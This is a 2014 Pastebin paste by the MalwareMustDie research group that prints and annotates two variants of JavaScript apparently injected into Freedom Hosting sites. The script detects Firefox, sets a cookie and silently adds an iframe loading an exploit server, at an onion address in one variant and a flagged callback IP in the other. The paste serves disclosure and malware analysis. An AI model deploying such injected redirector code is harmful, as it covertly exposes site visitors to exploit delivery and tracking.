SHARE
TWEET

Freedom Hosting FBI IFRAME Redirector Malware Script

MalwareMustDie Aug 12th, 2014 (edited) 1,444 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!
  2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
  3. # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. Additional: Analysis of Magento exploit payload used in infect Tor visitors, lead to the SAME IP:
  17. # Ref: https://pastebin.com/RTwsyrH8
  18. # Ref: https://pastebin.com/aFUP2gLB
  19.  
  20.  
  21. // Case 1
  22.  
  23.     function createCookie(name,value,minutes) {
  24.             if (minutes) {
  25.                     var date = new Date();
  26.                     date.setTime(date.getTime()+(minutes*60*1000));
  27.                     var expires = "; expires="+date.toGMTString();
  28.             }
  29.             else var expires = "";
  30.             document.cookie = name+"="+value+expires+"; path=/";
  31.     }
  32.      
  33.     function readCookie(name) {
  34.         var nameEQ = name + "=";
  35.         var ca = document.cookie.split(';');
  36.         for(var i=0;i < ca.length;i++) {
  37.             var c = ca[i];
  38.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
  39.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  40.         }
  41.         return null;
  42.     }
  43.      
  44.     function isFF() {
  45.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  46.     }
  47.      
  48.     function updatify() {
  49.         var iframe = document.createElement('iframe');
  50.         iframe.style.display = "inline";
  51.         iframe.frameBorder = "0";
  52.         iframe.scrolling = "no";
  53.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  54.         iframe.height = "5";
  55.         iframe.width = "*";
  56.         document.body.appendChild(iframe);
  57.     }
  58.      
  59.     function format_quick() {
  60.         if ( ! readCookie("n_serv") ) {
  61.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  62.             updatify();
  63.         }
  64.     }
  65.      
  66.     function isReady()
  67.     {
  68.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  69.      
  70.             if ( isFF() ) {
  71.                 format_quick();
  72.             }
  73.         }
  74.         else
  75.         {
  76.             setTimeout(isReady, 250);
  77.         }
  78.     }
  79.     setTimeout(isReady, 250);
  80.  
  81.  
  82. // Case 2
  83.  
  84. function createCookie(name, value, minutes) {
  85.     if (minutes) {
  86.         var date = new Date();
  87.         date.setTime(date.getTime() + (minutes * 60 * 1000));
  88.         var expires = "; expires=" + date.toGMTString();
  89.     } else var expires = "";
  90.     document.cookie = name + "=" + value + expires + "; path=/";
  91. }
  92.  
  93. function readCookie(name) {
  94.     var nameEQ = name + "=";
  95.     var ca = document.cookie.split(';');
  96.     for (var i = 0; i < ca.length; i++) {
  97.         var c = ca[i];
  98.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  99.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  100.     }
  101.     return null;
  102. }
  103.  
  104. function isFF() {
  105.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  106. }
  107.  
  108. function updatify() {
  109.     var iframe = document.createElement('iframe');
  110.     iframe.style.display = "inline";
  111.     iframe.frameBorder = "0";
  112.     iframe.scrolling = "no";
  113.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
  114.     iframe.height = "5";
  115.     iframe.width = "*";
  116.     document.body.appendChild(iframe);
  117. }
  118.  
  119. function freedomhost() {
  120.     if (!readCookie("n_serv")) {
  121.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
  122.         updatify();
  123.     }
  124. }
  125.  
  126. function isReady() {
  127.     if (document.readyState === "interactive" || document.readyState === "complete") {
  128.         if (isFF()) {
  129.             //window.alert(window.location + "Firefox Detected.")
  130.             freedomhost();
  131.         }
  132.     } else {
  133.         setTimeout(isReady, 250);
  134.     }
  135. }
  136. setTimeout(isReady, 250);
  137.  
  138. // Noted, same method,
  139. // second script is w/IP info callback, contacting remote host as per marked (1)
  140.  
  141.   IP Address: 65.222.202.53
  142.   City: Triadelphia
  143.   State or Region: West Virginia
  144.   Country: United States
  145.   ISP: Verizon Business
  146.   Latitude & Longitude: 40.0900-80.6220
  147.   Domain: verizonbusiness.com
  148.   ZIP Code: 26059
  149.  
  150. ---
  151. #MalwareMustDie! @unixfreaxjp
RAW Paste Data
Pastebin PRO BLACK FRIDAY Special!
Get 60% OFF on Pastebin PRO accounts!
Top